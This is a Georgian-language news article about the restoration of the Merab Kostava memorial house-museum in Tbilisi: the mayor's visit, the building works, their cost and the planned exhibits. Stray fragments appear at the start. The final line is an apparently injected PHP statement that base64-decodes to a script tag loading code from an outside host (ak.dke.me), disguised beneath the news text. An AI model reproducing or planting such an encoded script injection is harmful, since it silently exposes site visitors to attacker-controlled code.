celsiusi
ავერსი შნაიდერი

თბილისის მუზეუმების გაერთიანების მერაბ კოსტავას მემორიალურ სახლ-მუზეუმში რეაბილიტაცია - რესტავრაციის პირველი ეტაპის სამუშაოები დასრულდა. პროექტს დედაქალაქის მერი კახა კალაძე მოადგილეებთან, ირაკლი ბენდელიანთან და ანდრია ბასილაიასთან ერთად გაეცნო.

კახა კალაძის განცხადებით, რეაბილიტაციის პროცესი მიმდინარე წლის ოქტომბრისთვის დასრულდება.

„მერაბ კოსტავას სახლ-მუზეუმში იყო ძალიან მძიმე მდგომარეობა. პროექტის ფარგლებში სახლს სრული რეაბილიტაცია ჩაუტარდა. სარდაფი, რომელიც მთლიანად მიწით იყო ამოვსებული, გაიწმინდა და ძალიან დიდი სივრცე გამოთავისუფლდა. ასევე, აქ იყო კერძო საკუთრება, რომლის გამოსყიდვა მოხდა. ეზოც კეთილმოეწყობა და ოქტომბერში სამუშაოები მთლიანად დამთავრებული იქნება. ძალიან მიხარია, რომ ასეთი პროექტები ხორციელდება ჩვენს დედაქალაქში“, - განაცხადა კახა კალაძემ.

ადგილზე ასევე იმყოფებოდნენ თბილისის სახლ-მუზეუმების გაერთიანების ხელმძღვანელი ნინო სანადირაძე და თბილისის საკრებულოს წევრი ზურაბ აბაშიძე.

პროექტით გათვალისწინებული სამუშაოები შპს „გრანიტმა“ 2022 წლის გაზაფხულზე დაიწყო. თავდაპირველად ჩატარდა სადემონტაჟო და შენობის გამაგრების სამუშაოები, სარდაფები გაიწმინდა მიწის დანალექი მასებისგან, მოწესრიგდა მუზეუმის ეზოში არსებული წყალმომარაგების ქსელი, შეიცვალა სახურავი და საწვიმარი მილები, ავთენტური სახით მოეწყო შუშაბანდი, დამონტაჟდა გათბობა-გაგრილების სისტემები, მუზეუმი აღიჭურვა ვიდეოსამეთვალყურეო კამერებითა და ხანძარსაწინააღმდეგო; თანამედროვე სისტემებით, მუზეუმს ზანდუკელის ქუჩის მხრიდან დაემატა შემოსასვლელი კიბე, ეზოში დამონტაჟდა განათებისა და სანიაღვრე სისტემები, მოეწყო ავთენტური ქვაფენილი. მუზეუმი ადაპტირებულია და ითვალისწინებს სხვადასხვა საჭიროების ადამიანებისთვის სრულ ხელმისაწვდომობას.

გარდა მემორიალური შენობისა, სამუშაოები დასრულდა კერძო პირისგან გამოსყიდულ ფართშიც, რომელიც მერაბ კოსტავას მემორიალურ სახლ-მუზეუმის შენობაში მდებარეობდა. სარეაბილიტაციო სამუშაოების ღირებულებაა 1 052 786 ლარი.

რეაბილიტაციის დასრულების შემდეგ სახლ-მუზეუმში გამოიფინება მერაბ კოსტავას პირადი ნივთები, მემორიალური ავეჯი, ბიბლიოთეკა, ხელნაწერები, ნოტებისა და გრამფირფიტების კოლექცია, მე-20 საუკუნის II ნახევრის ეროვნულ-განმათავისუფლებელი მოძრაობის საქმიანობის ამსახველი დოკუმენტური მასალა, პირადი წერილები, მერაბ კოსტავას ინიციატივით გამოცემული არალეგალური ჟურნალ-გაზეთები და სხვა.

უკვე დაწყებულია მერაბ კოსტავას მემორიალური მუზეუმის საექსპოზიციო სივრცეების მზადება და ექსპოგრაფიის გეგმის მომზადება, მიმდინარეობს მემორიალური ნივთებისა და ეროვნული მოძრაობის ამსახველი მნიშვნელოვანი დოკუმენტაციის კონსერვაცია-რესტავრაცია და საგამოფენოდ მზადება, მუზეუმი დამთვალიერებლებისთვის 2024 წლის ბოლოს გაიხსნება.

მერაბ კოსტავას მემორიალური სახლ-მუზეუმი 1991 წელს საქართველოს პირველი პრეზიდენტის, ზვიად გამსახურდიას, ინიციატივითა და თაოსნობით დაარსდა. მუზეუმმა ბინა დაარსებისთანავე დაიდო ზანდუკელის ქუჩის N1-ში, მემორიალურ სახლში, სადაც 1939 წელს დაიბადა და სიცოცხლის ბოლომდე ცხოვრობდა საქართველოს ეროვნული გმირი მერაბ კოსტავა.

230
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");